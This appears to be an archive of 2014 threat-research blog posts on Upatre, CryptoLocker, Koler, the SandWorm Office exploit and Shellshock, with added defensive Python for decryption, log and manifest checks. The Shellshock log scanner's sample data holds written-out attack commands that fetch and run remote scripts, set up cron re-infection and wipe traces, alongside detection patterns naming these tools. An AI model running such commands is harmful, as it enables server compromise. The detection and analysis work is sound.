Wednesday, November 12, 2014

Evolution of Upatre Trojan Downloader


Upatre is a Trojan downloader family that, once installed, steals information and downloads additional malware onto the victim machine. It typically arrives via spam e-mail sent by the Cutwail botnet, either as an attachment or as a URL pointing to a remote hosting site. We are also seeing exploit kits used as a vector for Upatre infections in the wild.

Upatre Downloader cybercrime network

Upon successful infection, Upatre has been responsible for downloading malicious payloads from known malware families such as:
  • Zeus (Zbot) banking Trojan
  • Rovnix Volume Boot Record (VBR) bootkit
  • Dyreza (DYRE) banking Trojan
The Upatre malware family was first discovered in August 2013 and its infection rate rose sharply by October 2013. With the demise of the popular Blackhole exploit kit in October 2013, many malware authors fell back on traditional spam, with the Upatre Trojan downloader as the delivery medium for the ultimate payload, which also contributed to the increase in infections.

The Upatre authors have deployed multiple new techniques over the past year, which is one reason it is among the most prevalent malware families today. Some of the features we have tracked include:
  • Password protected attachments - This makes the e-mail look more legitimate and confidential
  • Spammed as an attachment inside an attachment - The spammed e-mail messages contained another e-mail message (*.msg, *.eml) as an attachment which contains the actual Upatre archive attachment
  • Email messages containing a URL pointing to the actual payload
  • Randomized header bytes and encrypted malware downloads to evade detection
  • Usage of SSL encryption for Command & Control (C2) communication and subsequent malware downloads
Recent Attacks

Over the past month we have seen an increase in Upatre downloader infections through spam messages containing fake invoices or voice-mail notifications. The final payload downloaded by these recent infections tends to be the Dyreza banking Trojan. Below is a sample e-mail message from this campaign:

Cutwail spam e-mail leading to Upatre

If the user clicks the link in the e-mail, the browser is redirected to the same site with additional parameters identifying the browser and operating system appended to the URI (the h, w and ua values) before the payload is served, as seen here:
GET /documents/invoice_101114_pdf.php?h=[3 digit integer]&w=[4 digit integer]&ua=[User-Agent String]&e=1 HTTP/1.1
The user is then prompted to download a zipped archive containing a new variant of the Upatre Trojan downloader, as seen below:

Upatre download in an archive

If the operating system is not supported, or once the download cycle completes, the user is redirected to a legitimate site (i.e. "").

The Upatre executable masquerades as a PDF document as seen here:

Upatre executable with PDF icon

The infection cycle begins once the user opens the enclosed executable. It copies itself to "%Temp%\pvavq.exe" and runs the copy; the new "pvavq.exe" process then deletes the original "invoice10-11-14_pdf.exe". It connects to a remote C2 server over TCP port 40007 to report the infection, supplying the month and year of the spammed binary, the victim's computer name, operating system information, etc.

Upatre network communication

It then downloads the Dyreza banking Trojan in encrypted form as "%Temp%\utt214.tmp" on the victim machine to evade network detection, decrypts the downloaded payload to "%Temp%\EXE1.exe" and executes it. This initiates the Dyreza banking Trojan infection cycle.

Dyreza banking Trojan encrypted and decrypted payload

This variant decrypts the downloaded payload with a 4-byte XOR key that is incremented as decryption proceeds, rather than the single hard-coded key seen in earlier variants.
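To make the distinction concrete, here is an added Python example (written for this write-up, not code recovered from the Upatre sample or from Zscaler) of a 4-byte XOR key that is incremented per block, next to the static-key scheme, together with the two things an analyst actually does with such a blob: recover the key from the known "MZ" header and tell the two schemes apart from the zero-filled stretches of a PE header. The seed value, the step of 1 and the little-endian byte order are assumptions; the post does not give the sample's values.

```python
"""Added example (not code from the original post or the Upatre sample):
decrypting a payload protected with an incrementing 4-byte XOR key, and the
known-plaintext trick an analyst uses to recover the key. The seed value,
step size and little-endian byte order below are assumptions; the post does
not state the sample's actual values."""
import struct

MASK32 = 0xFFFFFFFF


def xor_rolling(data: bytes, seed: int, step: int = 1) -> bytes:
    """XOR `data` four bytes at a time with a little-endian DWORD key that
    starts at `seed` and is incremented by `step` after every block.
    XOR is symmetric, so the same call encrypts and decrypts. A trailing
    partial block is XORed with the leading bytes of the current key."""
    out = bytearray()
    key = seed & MASK32
    for off in range(0, len(data), 4):
        key_bytes = struct.pack("<I", key)
        out.extend(b ^ k for b, k in zip(data[off:off + 4], key_bytes))
        key = (key + step) & MASK32
    return bytes(out)


def xor_static(data: bytes, key: int) -> bytes:
    """The older scheme the post contrasts against: one hard-coded DWORD key
    reused for every block (a step of zero)."""
    return xor_rolling(data, key, step=0)


def recover_seed(ciphertext: bytes, known_prefix: bytes = b"MZ\x90\x00") -> int:
    """Known-plaintext recovery: the downloaded payload is a PE file, so its
    first DWORD is the familiar 'MZ' header. XORing the first ciphertext
    DWORD with it yields the first key, i.e. the seed."""
    c0 = struct.unpack("<I", ciphertext[:4])[0]
    p0 = struct.unpack("<I", known_prefix[:4])[0]
    return c0 ^ p0


def infer_key_scheme(blob: bytes):
    """Heuristic for telling the two schemes apart when eyeballing a blob:
    PE headers contain long runs of zero bytes. Under a static key those
    encrypt to identical DWORDs; under an incrementing key they encrypt to
    DWORDs that differ by the step. Returns ('static', 0),
    ('incremental', step) or ('unknown', None)."""
    words = [struct.unpack("<I", blob[i:i + 4])[0]
             for i in range(0, len(blob) - 3, 4)]
    diffs = [(b - a) & MASK32 for a, b in zip(words, words[1:])]
    if not diffs:
        return ("unknown", None)
    common = max(set(diffs), key=diffs.count)
    if diffs.count(common) < max(4, len(diffs) // 4):
        return ("unknown", None)
    return ("static", 0) if common == 0 else ("incremental", common)


# Constructed stand-in for a downloaded PE: DOS header bytes, a zero-filled
# stretch as found in real headers, then some body bytes. Not a real sample.
SAMPLE_PE = (b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
             + bytes(64) + b"payload")
ASSUMED_SEED = 0x1337BEEF  # assumption: illustrative seed only


def demo() -> dict:
    """Encrypt with the incrementing scheme, then recover the seed and decrypt."""
    blob = xor_rolling(SAMPLE_PE, ASSUMED_SEED, step=1)
    seed = recover_seed(blob)
    return {
        "scheme": infer_key_scheme(blob),
        "seed_ok": seed == ASSUMED_SEED,
        "roundtrip_ok": xor_rolling(blob, seed, step=1) == SAMPLE_PE,
        "static_scheme": infer_key_scheme(xor_static(SAMPLE_PE, ASSUMED_SEED)),
    }


if __name__ == "__main__":
    print(demo())
```

The practical point is the last function: a static key leaves every zero-filled DWORD of the header encrypted to the same value, which is what gives the old scheme away at a glance, while the incremented key turns those runs into a counting sequence. Either way the "MZ" header hands over the first key, so the change buys evasion of naive signatures rather than real secrecy.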

Part of Upatre decryption routine for downloaded payload

The following screenshot shows the custom User-Agent string and hard coded remote server locations we found during our Upatre binary analysis:

unpacked Upatre binary

Indicators of Compromise

Here is a sample list of HTTP requests that will provide a good indication of an Upatre and Dyreza compromise on your network:

Upatre indicators of compromise

Additionally, we have seen the following three hardcoded User-Agent strings being used for the HTTP requests in the Upatre variants that we have analyzed:
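The indicator list and User-Agent strings above were captured in screenshots that are not reproduced here. As an added example (not part of the original post), the Python below turns the one URI pattern quoted earlier into a proxy-log check: it flags the fingerprinting request (invoice_<date>_pdf.php with h, w, ua and e=1) and pairs it with the .zip the same client fetches from the same host right afterwards. The log format, host name, client addresses, archive name and the six-digit date generalisation are assumptions made for this example.

```python
"""Added example (not from the original post): flag the Upatre download URI
pattern quoted above in web proxy logs and pair it with the archive download
that follows. Assumptions: the log format (timestamp client method url
status) and the host, zip name and addresses in the sample lines are
constructed for this example; the six-digit date stamp in
'invoice_<ddmmyy>_pdf.php' is generalised from the single URI in the post."""
import re
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(r"^(\S+) (\S+) (GET|POST) (\S+) (\d{3})$")
UPATRE_PHP_RE = re.compile(r"/invoice_\d{6}_pdf\.php$")


def parse_line(line: str):
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ts, client, method, url, status = m.groups()
    return {"ts": datetime.fromisoformat(ts), "client": client,
            "method": method, "url": url, "status": int(status)}


def is_upatre_redirect(url: str) -> bool:
    """Second-stage request: the invoice PHP page called with the
    fingerprint parameters h (3 digits), w (4 digits), ua and e=1."""
    parts = urlsplit(url)
    q = parse_qs(parts.query)
    return (UPATRE_PHP_RE.search(parts.path) is not None
            and q.get("e") == ["1"]
            and "ua" in q
            and re.fullmatch(r"\d{3}", q.get("h", [""])[0]) is not None
            and re.fullmatch(r"\d{4}", q.get("w", [""])[0]) is not None)


def find_upatre_requests(lines):
    """Every fingerprinting request, whether or not a download followed."""
    return [e for e in map(parse_line, lines) if e and is_upatre_redirect(e["url"])]


def find_upatre_chains(lines, window_s: int = 120):
    """Pair each fingerprinting request with a .zip fetched by the same
    client from the same host within `window_s` seconds. Lines are assumed
    to be in time order. Clients that fingerprint but never fetch the zip
    (e.g. an unsupported OS bounced to a legitimate site) are left out."""
    events = [e for e in map(parse_line, lines) if e]
    chains = []
    for i, e in enumerate(events):
        if not is_upatre_redirect(e["url"]):
            continue
        host = urlsplit(e["url"]).netloc
        for f in events[i + 1:]:
            if (f["ts"] - e["ts"]).total_seconds() > window_s:
                break
            if f["client"] != e["client"]:
                continue
            u = urlsplit(f["url"])
            if u.netloc == host and u.path.lower().endswith(".zip"):
                chains.append({"client": e["client"], "host": host,
                               "fingerprint": e["url"], "archive": f["url"]})
                break
    return chains


# Constructed proxy log: the host, client IPs, zip name and the Macintosh
# visitor that is bounced without a download are all invented for this example.
SAMPLE_LOG = [
    "2014-11-12T10:21:03 10.0.0.5 GET http://invoice-host.test/documents/invoice_101114_pdf.php 302",
    "2014-11-12T10:21:04 10.0.0.5 GET http://invoice-host.test/documents/invoice_101114_pdf.php?h=768&w=1366&ua=Mozilla%2F5.0%20(Windows%20NT%206.1)&e=1 200",
    "2014-11-12T10:21:09 10.0.0.5 GET http://invoice-host.test/documents/invoice10-11-14_pdf.zip 200",
    "2014-11-12T10:21:20 10.0.0.7 GET http://intranet.test/documents/invoice_2014.pdf 200",
    "2014-11-12T10:22:00 10.0.0.9 GET http://invoice-host.test/documents/invoice_101114_pdf.php?h=900&w=1440&ua=Mozilla%2F5.0%20(Macintosh)&e=1 302",
]

if __name__ == "__main__":
    for chain in find_upatre_chains(SAMPLE_LOG):
        print(chain)
```

Matching on the parameter shape rather than the exact file name survives the daily renaming of the invoice page, and the second pass separates machines that actually pulled the archive (and need the host-side checks described above) from browsers that were fingerprinted and bounced.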

The Upatre Trojan downloader family continues to evolve and is one of the most prevalent malware families at present. It continues to add new malware to its cyber crime pay-per-install nexus, serving as a vector for downloading and installing additional malware family payloads.

Zscaler ThreatLabZ is actively monitoring this threat and ensuring full security coverage for our customers.

Monday, October 27, 2014

Crypto-Ransomware Running Rampant

There is no doubt that ransomware is one of the most popular malware threats of 2014. Zscaler is not alone in this opinion: other security firms have observed up to a 700% increase in ransomware-related infections on victim PCs. It is no wonder the attacks are so effective when, for example, the delivery mechanism impersonates a legitimate service such as a harmless eFax.

This link is seen from a phishing e-mail.
Ransomware attacks can be monetized quickly and efficiently without the need to build a large-scale botnet or expose the attacker's affiliate ID through click-fraud schemes. We have seen multiple attack vectors used against end users, including phishing e-mail links and malvertising campaigns that lead to exploit kits. Attackers often pose as legitimate entities, such as a law enforcement agency or a mass media outlet, to lure the unsuspecting victim into their scheme.

We recently encountered a ransomware campaign leveraging phishing e-mails purporting to be from the Australian Postal Service. The spam themes used by the attackers involve parcel tracking or mobile invoices, with a link to the malicious content. Upon completion of a CAPTCHA, the user is served a zip file containing a malicious executable posing as a PDF document.

At the time of research, this file had a detection rate of 16/53 antivirus engines on VirusTotal. Before the victim has a chance to realize their mistake, they are greeted by a message informing them of just how badly they have been hit.

It's rare for a piece of malware to name itself to the victim...

The goal of Cryptolocker, or any other crypto-ransomware, is to encrypt personal files and hold them hostage. The attacker encrypts the files using a key that is either obtained during the phone-home request to a Command & Control (C2) server or hard-coded within the malicious executable. In this case, the malicious executable masquerades as a legitimate executable for the AQQ instant messenger.

AQQ is a popular IM application
Cryptolocker's encryption has evolved over the life of this threat, often relying on asymmetric encryption to lock the victim's files. This particular variant targeted the following folders for encryption:
  •  C:\MSOCache\All Users\
  •  C:\Users\[Public/Username]\
The ".encrypted" files can only the key controlled by the attacker can release them.

The threat also drops a file in the Windows directory and an associated registry key to launch that file at boot, ensuring the threat remains persistent if the victim reboots the system.

The autostart value is randomly generated.

Cryptolocker phones home to a hard-coded malicious domain over SSL. The SSL certificate carries the printable string 'debian'. This exchange supplies the key needed to encrypt the victim's files.

Inspecting C:\Windows\uhjrajyj.exe (the dropped file in this case) reveals the hard-coded phone-home domain.
The phone home address is hard-coded within the malicious payload.
Decrypted SSL traffic reveals the initial callback: a POST request containing the victim's machine name and a unique ID, as seen below:

Decrypted call back attempt
This variant was also found to use a Domain Generation Algorithm (DGA) for C2 communication, similar to the phone-home method of GameOver Zeus.

DGA activity

Most of these domains now return 504 errors because they have either not yet been registered or have already been shut down, but a few were still live at the time of research. Zscaler inspected the associated IP addresses and found them to be hosted in the Russian Federation. Two server IP addresses were of note at the time of writing; active ransomware URLs leading to these servers include:
  • usygoseqowapadoh[.]com:443
  • usygoseqowapadoh[.]com/topic.php
  • octoberpics[.]ru:443
  • octoberpics[.]ru/topic.php

Administrators should be on the lookout for the above connections, as they likely indicate a compromised system. Given how prevalent this threat is, the U.S. Government recently released an associated alert on the US-CERT site.

Regular backups of personal files remain a user's best chance of recovering from this attack. It is also important for system administrators to enforce strict file-type policies on the download of archive and executable files from unknown sources.

Friday, October 24, 2014

Android Ransomware 'Koler' Learns to Propagate via SMS

Android Koler is a family of ransomware that targets Android users by locking their mobile devices and demanding a ransom. It is believed to be the mobile extension of the Reveton ransomware family. Ransomware has been a profitable venture in the PC world with the likes of Cryptolocker, but is a relative newcomer on mobile devices, at least in part because of file restrictions in mobile operating systems that limit an app's access to the full file system. Despite this, the mobile market is clearly one that ransomware operators would like to tap into, and Koler is a step in that direction.

In the case of this new Koler variant, the malicious Android application arrives via a shortened URL to a Dropbox location and pretends to be an image file. If the unsuspecting user downloads and installs the package, it locks the screen and displays a fake FBI warning page (see below) accusing the user of viewing child pornography. We also found a new self-propagation module that spreads the malware by sending SMS messages containing the shortened URL to all contacts on the compromised device.


Name: IMG_7821.apk
Permissions requested:
  • android.permission.INTERNET
  • android.permission.READ_CONTACTS
  • android.permission.READ_PHONE_STATE
  • android.permission.RECEIVE_BOOT_COMPLETED
  • android.permission.SEND_SMS
  • android.permission.SYSTEM_ALERT_WINDOW
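An added example, not part of the original post: a Python triage of a decoded AndroidManifest.xml (as produced by apktool) that scores the permission combinations tied to the behaviour described above: SEND_SMS with READ_CONTACTS for the SMS spreading, SYSTEM_ALERT_WINDOW with RECEIVE_BOOT_COMPLETED for the persistent lock screen, and READ_PHONE_STATE with INTERNET for the device-ID callback. The two manifests, the package names and the pattern labels are constructed for this example.

```python
"""Added example (not code from the original post or the Koler sample):
triage of a decoded AndroidManifest.xml for the permission combinations that
the post ties to Koler's behaviour. Assumes the manifest has already been
decoded to plain XML (e.g. with apktool); the two manifests below, their
package names and the pattern labels are constructed for this example."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME_ATTR = f"{{{ANDROID_NS}}}name"

# Behaviour -> permissions that behaviour needs. Labels are this example's own.
PATTERNS = {
    "sms-self-propagation": {"android.permission.SEND_SMS",
                             "android.permission.READ_CONTACTS"},
    "persistent-screen-lock": {"android.permission.SYSTEM_ALERT_WINDOW",
                               "android.permission.RECEIVE_BOOT_COMPLETED"},
    "device-id-callback": {"android.permission.READ_PHONE_STATE",
                           "android.permission.INTERNET"},
}


def permissions(manifest_xml: str) -> set:
    root = ET.fromstring(manifest_xml)
    return {el.get(NAME_ATTR) for el in root.iter("uses-permission") if el.get(NAME_ATTR)}


def boot_receivers(manifest_xml: str) -> list:
    """Receivers registered for BOOT_COMPLETED, i.e. code that runs after a reboot."""
    root = ET.fromstring(manifest_xml)
    found = []
    for receiver in root.iter("receiver"):
        for action in receiver.iter("action"):
            if action.get(NAME_ATTR) == "android.intent.action.BOOT_COMPLETED":
                found.append(receiver.get(NAME_ATTR))
    return found


def triage(manifest_xml: str, claimed_kind: str = "") -> dict:
    """Return matched behaviour patterns plus notes when the permissions do
    not fit what the package claims to be (an 'image' that sends SMS)."""
    perms = permissions(manifest_xml)
    matched = sorted(label for label, needed in PATTERNS.items() if needed <= perms)
    notes = []
    if claimed_kind == "image" and "android.permission.SEND_SMS" in perms:
        notes.append("file presented as an image requests SEND_SMS")
    receivers = boot_receivers(manifest_xml)
    if receivers:
        notes.append("starts at boot: " + ", ".join(receivers))
    return {"permissions": sorted(perms), "patterns": matched, "notes": notes}


# Constructed manifest mirroring the permission set listed above, plus a
# boot receiver. The package and class names are placeholders.
KOLER_LIKE_MANIFEST = f"""<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="{ANDROID_NS}" package="com.example.locker">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
  <application android:label="IMG_7821">
    <receiver android:name=".BootReceiver">
      <intent-filter><action android:name="android.intent.action.BOOT_COMPLETED"/></intent-filter>
    </receiver>
  </application>
</manifest>"""

# Constructed manifest of a plausible image viewer for contrast.
BENIGN_MANIFEST = f"""<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="{ANDROID_NS}" package="com.example.gallery">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
  <application android:label="Gallery"/>
</manifest>"""

if __name__ == "__main__":
    print(triage(KOLER_LIKE_MANIFEST, claimed_kind="image"))
    print(triage(BENIGN_MANIFEST, claimed_kind="image"))
```

Permissions alone are not proof (a messaging app legitimately holds SEND_SMS and READ_CONTACTS); the signal here is the mismatch between what the file claims to be and what it asks for, which is exactly what a user would notice on the install screen if they read it.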

The user's device screen is locked with the following fake warning upon infection:

The ransom demanded to unlock the device is USD 300, as seen below:

Below, we can see the self-propagation code, where Koler sends text messages containing a link to download the Koler APK to all the contacts on the infected device.

Full text message that gets sent out:
 "someone made a profile  named -Luca Pelliciari- and he uploaded some of your photos! is that  you?". 

The shortened URL points to a Dropbox location hosting the same ransomware package; the Dropbox file has since been taken down.

Upon successful infection, the ransomware also connects to a predetermined command and control server and sends out sensitive device information such as the build version and device ID.

Command and Control callback

The ransomware variant also incorporates an anti-emulator check to hinder analysis inside an Android emulator. It reads the device ID (IMEI); if the value is all zeros, which is what the stock emulator returns, the application hides and terminates itself as seen below:


We did not see any file encryption routine to encrypt the user's files, but it is able to lock the screen and stay persistent even after reboot.

It is highly recommended that users install applications only from authorized stores. Check the developer information and ratings, review the permissions requested at install time (an "image" that asks to send SMS messages and read contacts, as this sample does, is a red flag), and ensure the application is signed by the expected developer.


Tuesday, October 14, 2014

Analysis of SandWorm (CVE-2014-4114) 0-Day


iSIGHT Partners, working with Microsoft, today published details of a 0-day vulnerability (CVE-2014-4114) used in a possible Russian cyber-espionage campaign targeting NATO, the European Union, and the telecommunications and energy sectors.

In this blog, we will provide a quick analysis of an exploit payload targeting this vulnerability, presently in the wild and showcase Zscaler's APT detection capabilities.

A vulnerability in the Windows Object Linking and Embedding (OLE) package manager allows an attacker to achieve remote code execution on the target system. The attacker exploits it via a specially crafted Microsoft Office file containing embedded OLE objects that reference files at a remote location. In the SandWorm exploit highlighted by iSIGHT Partners, the remote files include a malicious executable from a known malware family, the BlackEnergy Trojan. The BlackEnergy family first appeared in 2007 and has been involved in multiple targeted attack campaigns this year.

The exploit payload involved in this case is a PowerPoint Open XML Slide Show file named spiski_deputatov_done.ppsx. This file contains two malicious embedded OLE objects which point to remote files as seen below:
CVE-2014-4114: Embedded OLE Object 1
The embedded OLE Object 1 contains the remote location of the BlackEnergy Trojan, masquerading as a GIF image file.

CVE-2014-4114: Embedded OLE Object 2
The embedded OLE Object 2 contains the remote location of a Setup Information (INF) file, which Windows uses to install drivers. In this case, slides.inf contains directives to rename and execute the BlackEnergy Trojan executable slide1.gif, as seen below:

CVE-2014-4114: slides.inf file
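As an added example (not code from the original post, iSIGHT or Microsoft), the Python below scans an Office Open XML package for the structure this exploit depends on: oleObject relationships in a slide's .rels part whose TargetMode is External, pointing at a remote path rather than an embedded part. It also builds a minimal PPSX-like package with a remote .gif and .inf pair to run against; the documentation-range UNC host 192.0.2.10 and the share name are placeholders, since the post does not reproduce the real location.

```python
"""Added example (not code from the original post or from iSIGHT/Microsoft):
scan an Office Open XML package for OLE relationships that point outside the
file, which is the structure this exploit relies on. The sample package and
the documentation-range UNC host 192.0.2.10 are constructed here; the real
document's remote location is not reproduced in the post."""
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
LAYOUT_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout"


def external_ole_targets(package: bytes) -> list:
    """(rels part, target) for every oleObject relationship whose target is
    outside the package. Embedded (internal) OLE objects are not reported."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(package)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("Type") == OLE_REL and rel.get("TargetMode") == "External":
                    hits.append((name, rel.get("Target")))
    return hits


def assess(package: bytes) -> list:
    """Attach reasons: a UNC/SMB path means the object is fetched from a
    remote share when the deck is opened; an .inf target is a setup file
    that Windows will process, which is how slides.inf renames and runs
    slide1.gif in the case described above."""
    findings = []
    for part, target in external_ole_targets(package):
        t = target.lower()
        reasons = []
        if t.startswith("\\\\") or t.startswith("//") or t.startswith("file:"):
            reasons.append("remote UNC/SMB target")
        if t.endswith(".inf"):
            reasons.append("setup information (.inf) file")
        findings.append({"part": part, "target": target, "reasons": reasons})
    return findings


def build_sample(external_targets) -> bytes:
    """Construct a minimal PPSX-like package with one slide whose
    relationship part lists the given external OLE targets."""
    rels = [f'<Relationship Id="rId1" Type="{LAYOUT_REL}" '
            f'Target="../slideLayouts/slideLayout1.xml"/>']
    for i, target in enumerate(external_targets, start=2):
        rels.append(f'<Relationship Id="rId{i}" Type="{OLE_REL}" '
                    f'Target="{target}" TargetMode="External"/>')
    rels_xml = (f'<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="{REL_NS}">'
                + "".join(rels) + "</Relationships>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", '<?xml version="1.0"?><Types/>')
        z.writestr("ppt/slides/slide1.xml", '<?xml version="1.0"?><sld/>')
        z.writestr("ppt/slides/_rels/slide1.xml.rels", rels_xml)
    return buf.getvalue()


# Constructed to mirror the two objects described above (remote GIF + INF).
SANDWORM_LIKE = build_sample(["\\\\192.0.2.10\\public\\slide1.gif",
                              "\\\\192.0.2.10\\public\\slides.inf"])
CLEAN_DECK = build_sample([])

if __name__ == "__main__":
    for finding in assess(SANDWORM_LIKE):
        print(finding)
```

A legitimate deck embeds its OLE payloads as parts inside the zip, so an External oleObject relationship is rare enough to alert on by itself; the UNC and .inf checks only explain why this particular pair is dangerous.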
The process flow for this infection cycle looks like below:

CVE-2014-4114: Process flow during a successful exploit cycle
The end user will be completely oblivious to this infection cycle and will simply see a slide show containing the following images:

CVE-2014-4114: Exploit payload PPSX images seen by user

Zscaler APT detection

The Zscaler Behavioral Analysis engine accurately flags this 0-day exploit payload as malicious and blocks it as seen in the report below:


All supported versions of Microsoft Windows, including Windows Server 2008 and 2012, are vulnerable. It is extremely important for enterprises to install the latest Microsoft security patches to avert these attacks. More information about the patch is available in Microsoft Security Bulletin MS14-060.
Zscaler ThreatLabZ has deployed multiple levels of security countermeasures to protect the customers against these 0-day exploits.

Deepen Desai

Tuesday, October 7, 2014

#BASHed Evolution of Shellshock Attack payloads

We recently blogged about the GNU Bash arbitrary code execution vulnerability (CVE-2014-6271), dubbed Shellshock, and covered some initial attacks captured in the wild during the first week after disclosure. We have continued to monitor Shellshock exploit attacks and the malicious payloads being dropped over the past two weeks.

In this blog, we share a summary of new exploit attacks and the new tricks cybercriminals have deployed to increase their chances of infection.

Shellshock Attack analysis

The first attack, as reported in our previous blog, involved download and installation of a Linux Backdoor Trojan with DDoS capability detected by us as Unix/Flooder.AN.

Here the attack pattern was straightforward: if the Bash exploit succeeded, a malware payload was downloaded and installed.

Perl IRC bots

Next we saw a series of exploit attempts where a Perl based IRC bot was getting downloaded and executed on the target server. We will share two sample cases here.

In the first case, we saw a Base64 encoded Perl based IRC bot getting downloaded, decoded and executed on the target machine.

Shellshock exploit downloading Perl IRC bot

Base64 encoded Perl IRC bot

In the second case, we saw another Perl IRC bot getting downloaded and executed with a command-line argument which is the IRC server IP.

Shellshock exploit downloading Perl IRC bot

Perl IRC bot

The attacker performs the following actions here before downloading and running the bot:
  • Terminate all the PHP and PERL instances running on the server.
  • Attempts to delete all the content in the /tmp/ and /var/tmp/ directory.
  • Avoids hardcoding the Command and Control server IP in the bot file that gets downloaded.
Things became more interesting when we started seeing attacks that add stealth and persistence to the infection, and even attempt to apply security patches to the server once the infection has succeeded, so that nobody else can exploit it.

Linux.Tsunami C source code

In the attack case shown below, a Bash script is downloaded and executed on the target server upon a successful exploit attempt.

Shellshock exploit downloading C IRC bot

Shell script payload downloaded upon successful exploit

The shell script performs the following actions:
  • Downloads an IRC bot written in the C programming language
  • Attempts to compile the C bot with the gcc compiler on the victim server
  • Executes the newly built ELF IRC bot binary
  • Creates a crontab entry to download and re-infect the system on a weekly basis
This is a way of establishing persistence: even if the system administrator identifies and removes the culprit file, the system will be re-infected when the cron job triggers. The attacker also transfers a plain-text file rather than an ELF binary in an attempt to evade network perimeter defenses.

Linux.Tsunami ELF binary

In the most recent case, the attacker first ensures that the current Bash session is not recorded to the history file. It then downloads and executes a shell script on the target server, as seen below:

Shellshock exploit attempt downloading Linux.Tsunami

Shell script payload downloaded upon successful exploit

The shell script performs the following actions:
  • Downloads and executes a new variant of the Linux.Tsunami DDoS bot
  • Creates a crontab entry to ensure future updates and persistence
  • Attempts to download and apply a patch for the Bash vulnerability, presumably to keep competitors from re-exploiting the server
  • Uses the shred command before deleting itself (the downloaded shell script)
(The shred command overwrites the specified file(s) repeatedly, in order to make it harder for even very expensive hardware probing to recover the data, as its man page puts it.)


We have seen a quick evolution in the Shellshock exploit attack payloads that can be broadly classified into the following categories:
  • Persistence - achieved by creating a cron job.
  • Evasion - Base64-encoded payload (Perl bot) and transfer of plain-text C source code instead of a binary.
  • Stealth - suppressing the Bash session history, and using the shred and rm commands.
  • Competitive advantage - removing other exploit payloads, installing a new payload and applying security patches to prevent further exploit and infection attempts.
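As an added example (not part of the original post), the Python below applies the categories above to web server access logs: it picks out requests carrying the "() { ...};" prefix, extracts the URLs the injected command downloads from, and tags the tricks described in the cases above (cron persistence, history suppression, shred/rm, compiling on the host, killing competing bots, patching Bash). The sample log lines, addresses (documentation ranges) and payload URLs are constructed.

```python
"""Added example (not code from the original post): pick Shellshock exploit
attempts out of web server access logs and classify the tricks in the
injected command using the categories summarised above. The log lines,
IP addresses (documentation ranges) and payload URLs are constructed."""
import re

# The "() { ...};" function-definition prefix that triggers CVE-2014-6271.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")
URL_RE = re.compile(r"https?://[^\s'\";|&]+")

# Trick name -> pattern seen in the injected command. Names are this example's own.
TRICKS = {
    "download": re.compile(r"\b(wget|curl|fetch)\b"),
    "encoded-payload": re.compile(r"\bbase64\b.*(-d\b|--decode)"),
    "compile-on-host": re.compile(r"\bgcc\b"),
    "persistence-cron": re.compile(r"\bcrontab\b|/etc/cron"),
    "anti-history": re.compile(r"unset HISTFILE|history -c|HISTSIZE=0"),
    "anti-forensics": re.compile(r"\bshred\b|\brm -[rf]{1,2}\b"),
    "kill-competitors": re.compile(r"\b(pkill|killall)\b.*\b(perl|php)\b"),
    "patch-bash": re.compile(r"(yum|apt-get)\b.*\b(install|update|upgrade)\b.*\bbash\b"),
}


def classify(command: str) -> dict:
    """URLs the command reaches out to and the tricks it uses, sorted."""
    return {"urls": URL_RE.findall(command),
            "tricks": sorted(name for name, rx in TRICKS.items() if rx.search(command))}


def scan(lines) -> list:
    """One finding per log line carrying the exploit prefix. The command is
    everything after the first '};'; the source IP is the first field."""
    findings = []
    for line in lines:
        m = SHELLSHOCK_RE.search(line)
        if not m:
            continue
        command = line[m.end():].rstrip('"\\').strip()
        findings.append({"src": line.split()[0], "command": command, **classify(command)})
    return findings


# Constructed access-log lines in combined format, modelled on the cases above.
SAMPLE_LOG = [
    r'203.0.113.5 - - [07/Oct/2014:10:00:01 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 - "-" "() { :;}; /bin/bash -c \"wget -O /tmp/x.pl http://198.51.100.7/x.pl; perl /tmp/x.pl 198.51.100.7\""',
    r'203.0.113.9 - - [07/Oct/2014:10:05:44 +0000] "GET /cgi-bin/status HTTP/1.1" 200 - "-" "() { :;}; /bin/bash -c \"unset HISTFILE; killall perl php; cd /tmp; wget http://198.51.100.8/s.sh -O s.sh; sh s.sh; shred -u s.sh; rm -rf /tmp/s.sh\""',
    r'203.0.113.12 - - [07/Oct/2014:10:07:10 +0000] "GET /cgi-bin/status HTTP/1.1" 200 - "-" "() { :;}; /bin/bash -c \"echo \'*/5 * * * * wget -qO- http://198.51.100.8/s.sh | sh\' | crontab -; yum -y update bash\""',
    r'198.51.100.1 - - [07/Oct/2014:10:08:00 +0000] "GET /index.html HTTP/1.1" 200 4523 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["src"], finding["tricks"], finding["urls"])
```

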